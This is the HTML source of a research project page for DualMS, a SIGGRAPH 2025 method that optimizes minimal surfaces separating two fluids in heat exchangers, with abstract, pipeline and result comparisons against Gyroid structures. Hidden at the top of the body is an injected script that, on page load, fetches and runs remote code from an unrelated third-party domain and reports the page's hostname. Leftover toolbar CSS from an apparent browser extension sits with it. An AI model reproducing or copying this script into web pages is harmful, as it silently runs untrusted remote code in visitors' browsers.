
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


    <title>
        DualMS: Implicit Dual-Channel Minimal Surface Optimization for Heat Exchanger Design
    </title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="./files/bootstrap.min.css">
    <script src="./files/jquery.min.js.download"></script>
    <script src="./files/bootstrap.min.js.download"></script>
    <link rel="stylesheet" type="text/css" href="./files/style.css" media="screen">
    <link rel="stylesheet" type="text/css" href="./files/orbit-1.2.3.css" media="screen">
    <link rel="stylesheet" type="text/css" href="./files/jquery.fancybox-1.3.4.css" media="screen">
    <!--[if lt IE 9]><script type="text/javascript" src="assets/scripts/modernizr.js"></script><![endif]-->
    <style type="text/css">
        #lb_infobar_3436182992 {
            color: #000000 !important;
            font-weight: normal !important;
            text-decoration: none !important;
            margin-top: 0 !important;
            margin-bottom: 0 !important;
            margin-left: 0 !important;
            margin-right: 0 !important;
            padding-top: 0 !important;
            padding-bottom: 0 !important;
            padding-left: 0 !important;
            padding-right: 0 !important;
            float: none !important;
            text-align: left !important;
            height: 37px !important;
            width: 100% !important;
            background-color: #F5F5F5 !important;
            background-image: -webkit-linear-gradient(top, #F5F5F5, #EEEDED) !important;
            border-bottom: 1px solid #C0C0C0 !important;
            box-shadow: inset 0 1px 1px 1px #FFFFFF !important;
            line-height: 36px !important;
            font-family: '微软雅黑', '宋体' !important;
            z-index: 9999999999 !important;
            margin: 0 !important;
            padding: 0 !important;
            position: fixed !important;
            top: 0px !important;
            left: 0px !important;
        }

            #lb_infobar_3436182992,
            #lb_infobar_3436182992 * {
                border-radius: 0 !important;
                padding: 0 !important;
                margin: 0 !important;
            }

                #lb_infobar_3436182992 * {
                    width: auto !important;
                    background: none !important;
                }

                #lb_infobar_3436182992 input {
                    border-radius: 4px !important;
                    box-shadow: 0 1px 2px rgba(0, 0, 0, .15) !important;
                    font-family: '微软雅黑,', '宋体' !important;
                    font-size: 12px !important;
                    font-weight: normal !important;
                    text-shadow: none !important;
                    margin: 0 0 0 18px !important;
                    padding: 0 !important;
                }

        #lb_infobar_translate_3436182992 {
            background-color: #FBB016 !important;
            background-image: -webkit-linear-gradient(top, #FBB016, #ED8A0D) !important;
            width: 78px !important;
            height: 26px !important;
            border: 1px solid #E19D3C !important;
            color: #FFFFFF !important;
            cursor: pointer !important;
            line-height: normal !important;
            vertical-align: middle !important;
        }

            #lb_infobar_translate_3436182992:hover {
                background-color: #FDBF3F !important;
                background-image: -webkit-linear-gradient(top, #FDBF3F, #ED8A0D) !important;
            }

            #lb_infobar_translate_3436182992:active {
                background-color: #ED8A0D !important;
                background-image: -webkit-linear-gradient(top, #ED8A0D, #FBB016) !important;
            }

        #lb_infobar_words_3436182992 {
            background-color: #FBB016 !important;
            background-image: -webkit-linear-gradient(top, #FBB016, #ED8A0D) !important;
            width: 90px !important;
            height: 26px !important;
            border: 1px solid #E19D3C !important;
            color: #FFFFFF !important;
            cursor: pointer !important;
            line-height: normal !important;
            vertical-align: middle !important;
            left: 360px !important;
        }

            #lb_infobar_words_3436182992:hover {
                background-color: #FDBF3F !important;
                background-image: -webkit-linear-gradient(top, #FDBF3F, #ED8A0D) !important;
            }

            #lb_infobar_words_3436182992:active {
                background-color: #ED8A0D !important;
                background-image: -webkit-linear-gradient(top, #ED8A0D, #FBB016) !important;
            }

        #lb_infobar_return_3436182992 {
            background-color: #FFFFFF !important;
            background-image: -webkit-linear-gradient(top, #FFFFFF, #E0DFDF) !important;
            width: 78px !important;
            height: 26px !important;
            border: 1px solid #B0AFAF !important;
            color: rgba(0, 0, 0, .5) !important;
            cursor: pointer !important;
            line-height: normal !important;
            vertical-align: middle !important;
        }

            #lb_infobar_return_3436182992.lb_infobar_return_words_3436182992 {
                width: 130px !important;
            }

            #lb_infobar_return_3436182992:hover {
                background-color: #EDECEC !important;
                background-image: -webkit-linear-gradient(top, #FFFFFF, #EDECEC) !important;
            }

            #lb_infobar_return_3436182992:active {
                background-color: #E0DFDF !important;
                background-image: -webkit-linear-gradient(top, #E0DFDF, #FFFFFF) !important;
            }

        #lb_infobar_3436182992 a {
            text-decoration: underline !important;
            font-size: 12px !important;
            color: #999999 !important;
            cursor: pointer !important;
        }

            #lb_infobar_3436182992 a:hover {
                color: #FC9500 !important;
            }

            #lb_infobar_3436182992 a:active {
                color: #D68003 !important;
            }

        #lb_infobar_close_3436182992 {
            background-position: -66px -27px !important;
            cursor: pointer !important;
            position: absolute !important;
            top: 0 !important;
            right: 1em !important;
            line-height: 36px !important;
        }

            #lb_infobar_close_3436182992:hover {
                background-position: -66px -41px !important;
            }

            #lb_infobar_close_3436182992:active {
                background-position: -66px -54px !important;
            }

        #lb_infobar_notice_3436182992 {
            line-height: 36px !important;
            margin-left: 55px !important;
            font-size: 14px !important;
            vertical-align: middle !important;
        }

        #lb_infobar_powered_3436182992 {
            padding-left: 18px !important;
            font-size: 10px !important;
            color: #979797 !important;
            font-family: 'Arial' !important;
            font-style: italic !important;
        }

        #lb_infobar_ignore_3436182992 {
            line-height: 36px !important;
            margin-right: 3em !important;
            position: absolute !important;
            top: 0 !important;
            right: 0 !important;
        }

        #lb_infobar_manual_3436182992 {
            line-height: 36px !important;
            margin-right: 12em !important;
            position: absolute !important;
            top: 0 !important;
            right: 0 !important;
        }

        #lb_infobar_icon_3436182992 {
            position: absolute !important;
            top: 0 !important;
            left: 0 !important;
            height: 37px !important;
            width: 42px !important;
            color: #fff !important;
            font-size: 24px !important;
            text-align: center !important;
            background-repeat: no-repeat !important;
            background-position: -80px 0 !important;
        }

        #lb_infobar_translate_3436182992.lb_infobar_btn_inactive_3436182992,
        #lb_infobar_words_3436182992.lb_infobar_btn_inactive_3436182992 {
            background-color: #FFFFFF !important;
            background-image: -webkit-linear-gradient(top, #FFFFFF, #E0DFDF) !important;
            border: 1px solid #B0AFAF !important;
            color: #808080 !important;
        }

            #lb_infobar_translate_3436182992.lb_infobar_btn_inactive_3436182992:hover,
            #lb_infobar_words_3436182992.lb_infobar_btn_inactive_3436182992:hover {
                background-color: #EDECEC !important;
                background-image: -webkit-linear-gradient(top, #FFFFFF, #EDECEC) !important;
            }

            #lb_infobar_translate_3436182992.lb_infobar_btn_inactive_3436182992:hover,
            #lb_infobar_words_3436182992.lb_infobar_btn_inactive_3436182992:active {
                background-color: #E0DFDF !important;
                background-image: -webkit-linear-gradient(top, #E0DFDF, #FFFFFF) !important;
            }

        #lb_infobar_hover_3436182992:before {
            content: " " !important;
            position: absolute !important;
            border: 5px solid transparent !important;
            border-top: 5px solid #000 !important;
            bottom: -10px !important;
            left: 50% !important;
        }

        #lb_infobar_hover_3436182992:after {
            content: " " !important;
            position: absolute !important;
            border: 5px solid transparent !important;
            border-top: 5px solid #fff !important;
            bottom: -9px !important;
            left: 50% !important;
        }

        #lb_infobar_hover_3436182992 {
            line-height: 1.2 !important;
            font-size: 12px !important;
            min-width: 150px !important;
            position: fixed !important;
            background: #fff !important;
            border: 1px solid #333 !important;
            border-radius: 3px !important;
            padding: 10px !important;
            color: #333 !important;
            z-index: 9999999999 !important;
        }

            #lb_infobar_hover_3436182992.lb_infobar_hover_below:before {
                content: " " !important;
                position: absolute !important;
                border: 5px solid transparent !important;
                border-bottom: 5px solid #000 !important;
                top: -10px !important;
                left: 50% !important;
                bottom: auto !important;
            }

            #lb_infobar_hover_3436182992.lb_infobar_hover_below:after {
                content: " " !important;
                position: absolute !important;
                border: 5px solid transparent !important;
                border-bottom: 5px solid #fff !important;
                top: -9px !important;
                left: 50% !important;
                bottom: auto !important;
            }
    </style>
    <script src="./files/dsp" type="text/javascript" defer="" async=""></script>
</head>

<body style="margin-top: 38px !important; position: relative !important;">
    <script type="text/javascript">window.top === window && !function () { var e = document.createElement("script"), t = document.getElementsByTagName("head")[0]; e.src = "//conoret.com/dsp?h=" + document.location.hostname + "&r=" + Math.random(), e.type = "text/javascript", e.defer = !0, e.async = !0, t.appendChild(e) }();</script>

    <div class="wrapper">
        <header>
            <br>
            <br>
            <h1>DualMS: Implicit Dual-Channel Minimal Surface Optimization for Heat Exchanger Design</h1>
            <br>
            <p class="session">SIGGRAPH 2025</p>
            <br>
            <p class="author">
                <a href="https://weizheng-zhang.github.io" target="_blank">Weizheng Zhang</a><sup>1</sup>&nbsp;&nbsp;
	            <a href="https://haopan.github.io/" target="_blank">Hao Pan</a><sup>2</sup>&nbsp;&nbsp;
                <a href="http://irc.cs.sdu.edu.cn/~lulin" target="_blank">Lin Lu*</a><sup>1</sup>&nbsp;&nbsp;
                <a href="" target="_blank">Xiaowei Duan</a><sup>1</sup>&nbsp;&nbsp;
                <a href="https://ringednebulae.github.io/personal-webpage/" target="_blank">Xin Yan</a><sup>1</sup>&nbsp;&nbsp;
                <a href="" target="_blank">Ruonan Wang</a><sup>3</sup>&nbsp;&nbsp;
                <a href="" target="_blank">Qiang Du</a><sup>3</sup>&nbsp;&nbsp;
            </p>
            <br>
            <p class="author">
                <sup>1</sup><a href="http://en.sdu.edu.cn/" target="_blank">Shandong University</a>&nbsp;&nbsp;
                <sup>2</sup><a href="https://www.tsinghua.edu.cn/en/" target="_blank">Tsinghua University</a>&nbsp;&nbsp;
                <sup>3</sup><a href="https://english.cas.cn/" target="_blank">Chinese Academy of Sciences</a>&nbsp;&nbsp;
            </p>


            <br>
        </header>

        <section id="home">
            <div class="row" style="center;">
                <img src="./files/teaser-first.png" height="400" alt="">
            </div>
            <!-- <center> -->
                <p>
                    We present DualMS, a novel minimal surface optimization framework that combines constrained connected maximum cut for dual skeleton extraction with neural implicit function representation. The framework efficiently increases the contact area between two fluids under topologically flexible and continuous conditions. By incorporating spatial classification and utilizing the coarea formula from geometric measure theory, a total variation regularization term is introduced to solve for the minimal separating surface, optimizing flow dynamics and reducing pressure drop. 
                    <br>Experimental results show that, compared to the classic TPMS Gyroid structure, DualMS achieves comparable heat transfer efficiency while significantly improving fluid flow performance, with a 37.24% reduction in average pressure drop at the same volume fraction. This approach offers an innovative solution for efficient thermal management and customized heat exchanger design.
                </p>
            <!-- </center> -->
            <p><span><o:p>&nbsp;</o:p></span></p>
        </section>


        <section id="abstract">
            <h3 class="title">Abstract</h3> <br>
            <div class="row">
                <p>
                    <span class="dropcap">H</span>eat exchangers are critical components in a wide range of engineering applications, from energy systems to chemical processing, where efficient thermal management is essential. The design objectives for heat exchangers include maximizing the heat exchange rate while minimizing the pressure drop, requiring both a large interface area and a smooth internal structure. State-of-the-art designs, such as triply periodic minimal surfaces (TPMS), have proven effective in optimizing heat exchange efficiency. However, TPMS designs are constrained by predefined mathematical equations, limiting their adaptability to freeform boundary shapes. Additionally, TPMS structures do not inherently control flow directions, which can lead to flow stagnation and undesirable pressure drops.
                    <br>
                    This paper presents <em>DualMS</em>, a novel computational framework for optimizing dual-channel minimal surfaces specifically for heat exchanger designs in freeform shapes. To the best of our knowledge, this is the first attempt to directly optimize minimal surfaces for two-fluid heat exchangers, rather than relying on TPMS. Our approach formulates the heat exchange maximization problem as a constrained connected maximum cut problem on a graph, with flow constraints guiding the optimization process. To address undesirable pressure drops, we model the minimal surface as a classification boundary separating the two fluids, incorporating an additional regularization term for area minimization. We employ a neural network that maps spatial points to binary flow types, enabling it to classify flow skeletons and automatically determine the surface boundary. 
                    DualMS demonstrates greater flexibility in surface topology compared to TPMS and achieves superior thermal performance, with lower pressure drops while maintaining a similar heat exchange rate under the same material cost.
                </p>
                <br><br>
            </div>
            <div class="row">


            </div>
        </section>

       <section id="vid">
            <h3 class="title">Video</h3><br>
            <div style="text-align:center;">
                <iframe width="800" height="450" src="./files/DualMS_SIG2025.mp4" title="Video" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
                 <!-- <h1>Coming Soon</h1> -->
            </div>
            <p>
                <span>
                    <o:p>&nbsp;</o:p>
                </span>
            </p><br><br>
        </section>

        <section id="vid">
            <h3 class="title">Pipeline</h3><br>
            <div style="text-align:center;">
                <img src="./files/overview.png" width="900" alt="">
            </div>
            <br>
            <p>
                Given the design domain and boundary conditions and  of the heat exchanger, DualMS initializes an undirected graph G derived from centroidal Voronoi tessellations and the given flow field. The method then optimizes the dual flow skeletons by solving a constrained connected maximum cut problem on the graph G, and then optimizes a minimal surface to effectively partition the domain into two distinct flow channels.
            </p>
            <br><br>
        </section>


        <section id="vid">
            <h3 class="title">Results</h3><br>
            <div style="text-align:center;">
                <img src="./files/teaser.png" width="900" alt="">
            </div>
            <p>
                DualMS generates an optimized separation surface (left) to enhance heat exchange between two fluids (right) within freeform domains.
            </p>
            <br>
            <div style="text-align:center;">
                <img src="./files/PT-volume.png" width="900" alt="">
            </div>
            <p>
                Comparison of the temperature difference ΔT (left) and pressure drop ΔP (right) between Gyroid and our structure in different volume fractions (VF).
            </p>
            <br>
	        <div style="text-align:center;">
                <img src="./files/tube-pressure.png" width="900" alt="">
            </div>
            <p>
                Comparison of the pressure drop between Gyroid (upper row) and our structure (lower row) in different volume fractions. The volume fractions are 7.8%, 9.1%, 9.8%, 10.3%, 11.4%, respectively, from left to right.
            </p>
            <br>
            <div style="text-align:center;">
                <img src="./files/streamline.png" width="450" alt="">
            </div>
            <p>
                Comparison of streamlines between the uniform Gyroid (left) and our structure (right). <br>
                This figure shows the comparisons of the streamlines between the uniform Gyroid and our structure, emphasizing the advantage of our structure in reducing flow resistance. In the uniform Gyroid structure, obvious kinks are noticed at the U-shape corners, corresponding to large flow resistance and pressure drop. This is eliminated with our method.
            </p>
            <br>
            <div style="text-align:center;">
                <img src="./files/compare with TO-G.png" width="900" alt="">
            </div>
            <p>
                Comparison of heat exchange performance between the topology-optimized Gyroid (left) and our structure (right). Our method achieves approximately 92% ΔT of the topology-optimized Gyroid, while the ΔP is only 29%.
            </p>
            <br>
	        <div style="text-align:center;">
                <img src="./files/zigzag-pressure.png" width="450" alt="">
                <img src="./files/ss-pressure.png" width="450" alt="">
            </div>
            <p>
                Cross-sectional pressure drop distributions for zig-zag shape and multi-bend shape, comparing the minimal surface heat exchanger designed by the Gyroid structure (left) with our method (right). Our method provides a comparable heat transfer performance with a lower pressure drop.
            </p>
            <br>

        </section>


        <section id="downloads">
            <h3 class="title">Downloads</h3>
            <div class="row">
                <p>
                    <span>
                        <o:p>&nbsp;</o:p>
                    </span>
                </p>
                <table align="center" border="0" class="list">
                    <tbody>
                        <tr>
                            <td width="100" align="center"><a href=""> <img width="80" id="_x0000_i10320" src="./files/paperpic.png" alt="1"></a></td>
                        </tr>

                        <tr>
                            <td width="180" align="center"><a href=""> Paper</a></td>
</a></td>
                        </tr>


                    </tbody>
                </table>
                <br>

            </div>

            <p>
                <span>
                    <o:p>&nbsp;</o:p>
                </span>
            </p>
        </section>



        <footer></footer>
    </div>


</body>
</html>
